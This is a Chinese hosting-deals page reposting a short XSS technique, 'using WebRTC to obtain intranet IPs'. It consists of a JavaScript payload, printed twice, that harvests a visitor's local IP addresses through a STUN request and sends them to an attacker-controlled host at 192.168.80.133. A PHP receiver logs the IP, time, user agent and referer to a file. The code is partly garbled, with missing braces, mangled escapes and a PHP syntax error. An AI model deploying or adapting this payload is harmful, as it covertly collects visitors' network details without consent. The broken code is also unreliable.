主机参考
| 主机参考:VPS测评参考推荐/专注分享VPS服务器优惠信息!若您是商家可以在本站进行投稿,查看详情!此外我们还提供软文收录、PayPal代付、广告赞助等服务,查看详情! |
| 我们发布的部分优惠活动文章可能存在时效性,购买时建议在本站搜索商家名称可查看相关文章充分了解该商家!若非中文页面可使用Edge浏览器同步翻译!PayPal代付/收录合作 |
xss.js
function getIPs(callback){
var ip_dups = {};
//compatibility for firefox and chrome
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
var useWebKit = !!window.webkitRTCPeerConnection;
//bypass naive webrtc blocking using an iframe
if(!RTCPeerConnection){
//NOTE: you need to have an iframe in the page right above the script tag
//
//<iframe id="iframe" sandbox="allow-same-origin" gt;</iframegt;
//<scriptgt;...getIPs called in here...
//
var win = iframe.contentWindow;
RTCPeerConnection = win.RTCPeerConnection
|| win.mozRTCPeerConnection
|| win.webkitRTCPeerConnection;
useWebKit = !!win.webkitRTCPeerConnection;
}
//minimal requirements for data connection
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
//construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);
function handleCandidate(candidate){
//match just the IP address
var ip_regex = /([0-9]{1,3}(.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
var ip_addr = ip_regex.exec(candidate)[1];
//remove duplicates
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
//listen for candidate events
pc.onicecandidate = function(ice){
//skip non-candidate events
if(ice.candidate)
handleCandidate(ice.candidate.candidate);
};
//create a bogus data channel
pc.createDataChannel("");
//create an offer sdp
pc.createOffer(function(result){
//trigger the stun server request
pc.setLocalDescription(result, function(){}, function(){});
}, function(){});
//wait for a while to let everything done
setTimeout(function(){
//read candidate info from local description
var lines = pc.localDescription.sdp.split('n');
lines.forEach(function(line){
if(line.indexOf('a=candidate:') === 0)
handleCandidate(line);
});
}, 1000);
}
//insert IP addresses into the page
getIPs(function(ip){ var url="http://192.168.80.133:81/aaa.php?ip="+ip;
var xmlhttp1=new XMLHttpRequest();
xmlhttp1.open("GET", url, true);
xmlhttp1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp1.send(null); });
server端:
<?php
$ip=$_GET['ip'];
$time=date("j F, Y, g:i a");
$agent = $_SERVER['HTTP_USER_AGENT'];
$referer=getenv('HTTP_REFERER');
$text = 'ip:' =.$ip."rn".'Time:'.$time."rn".'User Agent:'.$agent."rn".'Referer:'.$referer."rn";
$file = fopen('vb.php' , 'a+');
fwrite($file,$text);
fclose($file);
?gt;
xss.js
function getIPs(callback){
var ip_dups = {};
//compatibility for firefox and chrome
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
var useWebKit = !!window.webkitRTCPeerConnection;
//bypass naive webrtc blocking using an iframe
if(!RTCPeerConnection){
//NOTE: you need to have an iframe in the page right above the script tag
//
//<iframe id="iframe" sandbox="allow-same-origin" gt;</iframegt;
//<scriptgt;...getIPs called in here...
//
var win = iframe.contentWindow;
RTCPeerConnection = win.RTCPeerConnection
|| win.mozRTCPeerConnection
|| win.webkitRTCPeerConnection;
useWebKit = !!win.webkitRTCPeerConnection;
}
//minimal requirements for data connection
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
//construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);
function handleCandidate(candidate){
//match just the IP address
var ip_regex = /([0-9]{1,3}(.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
var ip_addr = ip_regex.exec(candidate)[1];
//remove duplicates
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
//listen for candidate events
pc.onicecandidate = function(ice){
//skip non-candidate events
if(ice.candidate)
handleCandidate(ice.candidate.candidate);
};
//create a bogus data channel
pc.createDataChannel("");
//create an offer sdp
pc.createOffer(function(result){
//trigger the stun server request
pc.setLocalDescription(result, function(){}, function(){});
}, function(){});
//wait for a while to let everything done
setTimeout(function(){
//read candidate info from local description
var lines = pc.localDescription.sdp.split('n');
lines.forEach(function(line){
if(line.indexOf('a=candidate:') === 0)
handleCandidate(line);
});
}, 1000);
}
//insert IP addresses into the page
getIPs(function(ip){ var url="http://192.168.80.133:81/aaa.php?ip="+ip;
var xmlhttp1=new XMLHttpRequest();
xmlhttp1.open("GET", url, true);
xmlhttp1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp1.send(null); });
server端:
<?php
$ip=$_GET['ip'];
$time=date("j F, Y, g:i a");
$agent = $_SERVER['HTTP_USER_AGENT'];
$referer=getenv('HTTP_REFERER');
$text = 'ip:' =.$ip."rn".'Time:'.$time."rn".'User Agent:'.$agent."rn".'Referer:'.$referer."rn";
$file = fopen('vb.php' , 'a+');
fwrite($file,$text);
fclose($file);
?gt;
--------------------------------------------------------------
主机参考,收集国内外VPS,VPS测评,主机测评,云服务器,虚拟主机,独立服务器,国内外服务器,高性价比建站主机相关优惠信息@zhujicankao.com
详细介绍和测评国外VPS主机,云服务器,国外服务器,国外主机的相关优惠信息,商家背景,网络带宽等等,也是目前国内最好的主机云服务器VPS参考测评资讯优惠信息分享平台
这几篇文章你可能也喜欢:
- 恒创科技,全场3折优惠起,免备案香港VPS云服务器低至28元/月,香港/美国,新增多款特价服务器,1核1G内存5Mbps带宽不限流量,292元/年
- DediPath,国外便宜低价VPS云服务器最新优惠,美国洛杉矶/圣何塞/西雅图等,OVZ虚拟架构,2核5G内存1Gbps带宽,5美元/月
- 腾讯云,双十一特价优惠活动,高性价比国内轻量云服务器年付低至48元起,2核4G内存8Mbps带宽轻量云年付70元,续费2.5折起,还有海量代金券免费领
- 腾讯云,双11活动最后一天,超便宜云服务器2核4G内存8Mbps带宽仅198元/3年,无新账号可按照本文附带教程1个身份证开8个新用户账号抢购,买到就是赚到,挖币都能回本
- ShockHosting,最新特价优惠,全场VPS云服务器终身3.5折,美国/日本/新加坡/澳大利亚,KVM虚拟架构,1核2G内存1Gbps带宽,低至2.9美元/月
本文由主机参考刊发,转载请注明:xss-利用webrtc获取内网IP https://zhujicankao.com/12631.html
评论前必须登录!
注册